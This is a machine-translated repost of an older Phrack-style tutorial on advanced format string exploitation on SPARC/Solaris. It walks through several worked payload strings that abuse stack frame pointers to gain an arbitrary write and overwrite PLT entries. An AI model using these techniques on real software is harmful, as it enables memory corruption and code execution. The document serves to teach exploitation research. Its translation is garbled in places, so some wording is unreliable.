2. Tech
  3. [Principle] Advanced Format String Exploit Technology P59-0X07 (below)

[Principle] Advanced Format String Exploit Technology P59-0X07 (below)

xiaoxiao2021-03-06  46

Advanced Format String Exploit Technology P59-0X07 (below)

Creation time: 2002-08-23

Article attribute: translation

Article Source:

http://www.whitecell.org

Article submission:

DEBUGER (z_yikai_at_163.net)

Advanced Format String Exploit Technology P59-0X07 (below)

| = ----------------------- = [RIQ ] = ------------- ----------

Original: << Advances in Format String Exploiting >>

By Gera , riq

Yikaikai

http://www.whitecell.org

--[table of Contents

1 Introduction

2 - Pile

3 - Tips

3.1 - Example 1

3.2 - Example 2

3.3 - Example 3

3.4 - Example 4

4 - 4 bytes Write-Anything-Anywhere privilege abuse

4.1 - Example 5

5 Conclusion

5.1 - Is it dangerous to cover the stack frame register Local 0?

5.2 - Is this method reliable?

5.3 - Can I run in the i386 platform?

6 - after

6.1 - Reference

6.2 - Acknowledgment

--[ 1 Introduction

The usual Format String is located in the stack, but there is a stack, you can't see it.

SCUT talked about these "formatted string overflow attack section6.4" in his article

http://www.team-teeso.net/articles/formatstring/

Here I introduce a general method of processing this string on sparc (big-endian machines).

It is also similar to i386

- [2 - Pile

In the stack you can find the frame structure of the stack. The structure of the stack includes local variables, registers, pointing to the previous stack structure.

Pointer, return address, etc.

Since you can see these with a format string, we have to study it carefully.

SPARC-based stack structure is about the following.

Note, the SPARC contains 4 sets of universal registers, each group contains 8 registers. One of the groups is a global register.

The other three sets of registers are OUT, LOCAL, IN.

Frame 0 Frame 1 Frame 2

[L0] ----> [l0] ----> [l0]

[L1] | [l1] | [l1]

... | ... | ...

[L7] | [l7] | [l7]

[I0] | [I0] | [I0]

[I1] | [i1] | [i1]

... | ... | ...

[I5] | [i5] | [i5]

[Fp] ---- [fp] ---- [fp]

[I7] [i7] [i7] [TEMP 1] [TEMP 1]

[TEMP 2]

and many more

Register FP is a pointer to the calling frame, you can guess, 'fp' represents a frame pointer.

TEMP_N is a local variable stored in the stack, and the frame 1 starts from the local variable of frame 0,

Frame 2 starts from the local variable of frame 1, so that such push.

All frames are in the stack, so we can use our formatted string to see these

- [3 - 小 门

Knocking on the door is that there is a pointer finger forward a stack of frames, the more addresses you get to the stack,

The more you can succeed.

why? If we have a pointer belonging to your own stack, we can overwrite the address to any value.

- [3.1 - Example 1

Suppose we want to put the 0x1234 in the register local 0 of the frame 1, we have to do it to create a

Formatted strings, just reach the position of frame 0 fp, namely 0x1234, in which location, using formatted strings

Put the character '% n'.

Suppose the first parameter is in the local variable 0 of the frame 0, our formatted string is as follows (description with Python)

'% 8X' * 8 # pops up 8 Local registers

'% 8x' * 5 # Popked the top 5 registers in

'% 4640d' # Change the length of String (4640 IS 0x1220) and ...

'% n' # Writes in the FP pointing (Which is frame 1's l0)

When the format string is executed, the stack looks like this:

Frame 0 Frame 1

[L0] ----> [0x00001234]

[L1] | [l1]

... | ...

[L7] | [l7]

[I0] | [I0]

[I1] | [i1]

... | ...

[I5] | [i5]

[Fp] ---- [fp]

[I7] [i7]

[Temp 1] [TEMP 1]

[TEMP 2]

- [3.2 - Example 2

If we want to write a big number, like 0x20001234, we should look for two points to the same address in the stack.

Pointer, as follows

Frame 0 Frame 1

[L0] ----> [l0]

[L1] | [l1]

... | ...

[L7] | [l7]

[I0] | [I0]

[I1] | [i1]

... | ...

[I5] | [i5]

[Fp] ---- [fp]

[I7] | [i7]

[TEMP 1] ---- [Temp 1]

[TEMP 2]

[Note: Don't go find two pointers to the same address, although not rare]

So, our formatted string looks as follows.

'% 8X' * 8 # pops up 8 local registers '% 8x' * 5 # Popked the top 5 registers in

'% 4640d' # Change Format String Length (4640 = 0x1220)

'% n' # Writes in the FP pointing (Which is frame 1's l0)

'% 3530D' # again change the Format string length again

'% hn' # This time you change the high level!

We will get:

Frame 0 Frame 1

[L0] ----> [0x20001234]

[L1] | [l1]

... | ...

[L7] | [l7]

[I0] | [I0]

[I1] | [i1]

... | ...

[I5] | [i5]

[Fp] ---- [fp]

[I7] | [i7]

[TEMP 1] ---- [Temp 1]

[TEMP 2]

- [3.3 - EXAMPLE 3

In this example, we have only one pointer, in the formatted string, we can use direct access to the same

The result, with '% arg_number $', Arg_Number is located in 0-30 (Solaris).

My Format String is as follows

'% 4640d' # Change length

'% 15 $ n' # Write the 15th parameters (the 15th parameter is the FP location!)

'% 3530d' # again change the length

'% 15 $ hn' # written again (high part)!

Therefore, we will get the following results

Frame 0 Frame 1

[L0] ----> [0x20001234]

[L1] | [l1]

... | ...

[L7] | [l7]

[I0] | [I0]

[I1] | [i1]

... | ...

[I5] | [i5]

[Fp] ---- [fp]

[I7] [i7]

[Temp 1] [TEMP 1]

[TEMP 2]

- [3.4 - Example 4

But the two pointers do not point to the same address in the stack, and point to the first address in the stack.

Often beyond the scope of the top 30 parameters, then what should I do?

You must know the simple '% N', you can write a very large number, like 0x0028000 or bigger, you should know

The binary dynamic connection library is usually located at the low address, like 0x0002 ???. So, only one pointer points to the stack,

You can get a pointer to the binary PLT.

I think it is no longer necessary to use the picture.

- [4 - 4 bytes Write-Anything-Anywhere Permissions "Abuse

- [4.1 - Example 5

In order to get the privilege of 4Write-Anything-Anywhere, we should repeat what stack frame register local 0,

On another heavy, such as frame 1, the result appears as follows:

Frame 0 Frame 1 Frame 2

[L0] ----> [0x00029e8c] ----> [0x00029E8E]

[L1] | [l1] | [l1]

... | ... | ...

[L7] | [l7] | [l7]

[I0] | [I0] | [I0]

[I1] | [i1] | [i1]

... | ... | ...

[I5] | [i5] | [i5]

[Fp] ---- [fp] ---- [fp]

[I7] [i7] | [i7]

[Temp 1] [TEMP 1] |

[TEMP 2] ----

[TEMP 3]

[Note: As long as we want to change the code within 0x00029E8c]

Now, we have two pointers, one pointing to the 0x00029E8C to point to 0x00029E8E, we finally

I have achieved my own goals, now we can attack this location like attacking other format string.

This format string looks as follows:

'% 4640d' # Change length

'% 15 $ n' # Write the low part of the frame 1 register local 0 with direct access method

'% 3530d' # again change the length

'% 15 $ hn' # override the high part

'% 9876d' # change length

'% 18 $ hn' # and write like any format string exploit!

'% 8x' * 13 # pops up 13 parameters (from 15 parameters)

'% 6789d' # change length

'% n' # write low parts

'% 8x' # pops up

'% 1122d' # Change Length

'% hn' # Write the high part

'% 2211D' # Change length

'% hn' # again rewritten, just like any Exploit

You can see that this is just made by a format string, but not always like this.

If we can't create two pointers, we can do it, it is abuse of Format String.

First, create a pointer to 0x00029E8C, then we override 0x00029E8C with '% hn'

The pointer to the direction.

Then, we are abuse the format string, just like last, just point to 0x00029E8C

Pointer.

- [5] Conclusion - [5.1 - Is it dangerous to cover the stack frame register Local 0?

This is not the best, but practice shows that there is no problem with the value of Local 0, sometimes you may not be unfortunate, you would rather change

Local 0 belonging to main () or _start () frame

- [5.2 - Is this method reliable?

If you understand the situation of the stack, or know the size of the stack frame, it is reliable, otherwise this technology can't help

how much you.

I want to be your last choice when you have to override the value of zero, because you can't put 0 into Format

String (will truncate string)

Similarly, binary process coupling table (PLT) is located at a low address, covering binary PLT is more reliable than libc'tplt,

why? I think that Solaris will be connected to the library more frequently more frequent than you want Exploit. Maybe you want Exploit

Binary code will never change

- [5.3 - Can I run in the i386 platform?

Yes, perhaps, I think you may encounter '% n' and '% hn' problems,

(i386 is Little-endian), but I believe that other other in 386 can run normally.

- [6 - Postscript

- [6.1 - REFERENCES

Very Complete Format strings Article by scut:

*

http://www.team-teeso.net/articles/formatstring/

- [6.2 - Thanks to:

Juliano, for Letting Me Know That I Can Overwrite, As May Times AS I

Want An Address Using 'Direct Access', And Other Tips About Format Strings.

Gera, for His Ideas, Suggestions and fixes.

Javier, for helping me in sparc.

Bombi, for trying herne english.

And Bruce, For Correhensing My English, TOO.

RIQ.

| = [EOF] = ------------------------------------------------------------------------------------------------------------------------ ------------------- = |

[Thank Alert7, the eagle is supported by my support, especially the Alert7, in the first draft of my translation, many problems,

And give some references << Solaris for sparc stack overflow program Writing (1) >> Warning3 (Warning3@hotmail.com)]

转载请注明原文地址:https://www.9cbs.com/read-40808.html

9cbs

New Post(0)